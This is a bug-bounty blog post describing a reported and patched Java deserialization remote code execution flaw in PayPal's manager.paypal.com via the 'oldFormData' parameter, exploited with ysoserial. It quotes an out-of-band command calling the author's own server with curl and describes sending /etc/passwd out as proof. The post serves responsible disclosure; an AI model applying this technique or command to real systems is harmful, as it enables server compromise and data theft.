Paypal RCE
0 net
AI Summary
A critical remote code execution vulnerability was discovered in PayPal's manager.paypal.com through unsafe Java object deserialization in the 'oldFormData' parameter, exploitable via the Commons Collections gadget chain and ysoserial tool to execute arbitrary OS commands and access production databases. The vulnerability was reported in December 2015 and patched by PayPal's security team.
Tags
Entities
PayPal
manager.paypal.com
Michael Stepankin
artsploit
Chris Frohoff
Gabriel Lawrence
Mark Litchfield
FoxGlove Security
ysoserial
Commons Collections
Artsploit: [manager.paypal.com] Remote Code Execution Vulnerability Monday, January 25, 2016 [manager.paypal.com] Remote Code Execution Vulnerability In December 2015, I found a critical vulnerability in one of PayPal business websites ( manager.paypal.com ). It allowed me to execute arbitrary shell commands on PayPal web servers via unsafe JAVA object deserialization and to access production databases. I immediately reported this bug to PayPal security team and it was fixed promptly. Details While testing manager.paypal.com application, I noticed an unusual post form parameter “oldFormData” that looks like a complex object after base64 decoding: The following research showed that it is a Java serialized object without any signature. It means you can send a serialized object of any existing class to the server, and the “readObject” (or “readResolve” ) method of that class will be called. For exploitation, you need to find a suitable class in the application “classpath” which can be serialized and has something interesting (from exploitation point of view) in the “readObject” method. You can read about this technique in the recent article by FoxGlove Security . A year ago, Chris Frohoff (@frohoff) and Gabriel Lawrence (@gebl) did a great job and found suitable classes in Commons Collections library that could lead to remote code execution. They also published the “ysoserial” payload generation tool on their github page . Exploit I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the “curl x.s.artsploit.com/paypal” shell command. Then I sent the base64 encoded payload in the “oldFormData” parameter to the application server and was impressed by an incoming request from the PayPal network that appeared in my NGINX access log: I realized that I could execute arbitrary OS commands on the web servers of manager.paypal.com, establish a back connection to my own Internet server and, for example, upload and execute a backdoor. As a result, I could get access to production databases used by the manager.paypal.com application. 96 Normal 0 false false false EN-US X-NONE X-NONE Instead, I just read “/etc/passwd” file by sending it to my server as a proof of the vulnerability : I also recorded a video how to reproduce this vulnerability and reported it to the PayPal security team. Later, I found out that many other endpoints of the manager.paypal.com application also use serialized objects and can be exploited as well. In a month, my report received a Duplicate status because another researcher, Mark Litchfield, reported a similar vulnerability two days earlier than I did (on December 11, 2015). PayPal decided to pay me a good bounty anyway, and I have nothing but respect for them. 96 Normal 0 false false false EN-US X-NONE X-NONE Demo Posted by Michael Stepankin at 1:05:00 AM Email This BlogThis! Share to X Share to Facebook Share to Pinterest Labels: #bugbounty , #paypal , #RCE Newer Post Home Whoami Michael Stepankin @artsploit artsploit [at] gmail.com https://github.com/artsploit/ https://portswigger.net/research/michael-stepankin Popular Posts [demo.paypal.com] Node.js code injection (RCE) When I am trying to find vulnerabilities in web applications, I always perform fuzzing of all http parameters, and sometimes it gives me som... [manager.paypal.com] Remote Code Execution Vulnerability In December 2015, I found a critical vulnerability in one of PayPal business websites ( manager.paypal.com ). It allowed me to exe... 3 ways to get Remote Code Execution in Kafka UI When I first encountered Kafka UI, I was thrilled that such a dangerous functionality is exposed without authentication. After some time I d... mTLS: When certificate authentication is done wrong https://github.blog/2023-08-17-mtls-when-certificate-authentication-is-done-wrong/ In 2023 I spent some time researching x509 certificate au... Hidden OAuth attack vectors https://portswigger.net/research/hidden-oauth-attack-vectors I wrote this article while working at the PortSwigger Research team. Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 I wrote this article while working at the PortSwigger Rese... Exploiting Spring Boot Actuators https://www.veracode.com/blog/research/exploiting-spring-boot-actuators I wrote this article while working at the Veracode Research team. Spring View Manipulation Vulnerability https://www.veracode.com/blog/secure-development/spring-view-manipulation-vulnerability I wrote this article while working at the Veracode ... Exploiting JNDI Injections in Java https://www.veracode.com/blog/research/exploiting-jndi-injections-java I wrote this article while working at the Veracode Research team. Apache Solr Injection @ DEFCON 27 https://github.com/veracode-research/solr-injection A brand new vulnerability - Apache Solr Injection , as well as new ways to RCE in this ... Blog Archive ► 2024 (1) ► October (1) ► 2023 (1) ► August (1) ► 2021 (2) ► June (1) ► March (1) ► 2020 (1) ► September (1) ► 2019 (3) ► August (1) ► February (1) ► January (1) ▼ 2016 (2) ► August (1) ▼ January (1) [manager.paypal.com] Remote Code Execution Vulnera... Labels #bugbounty #paypal #RCE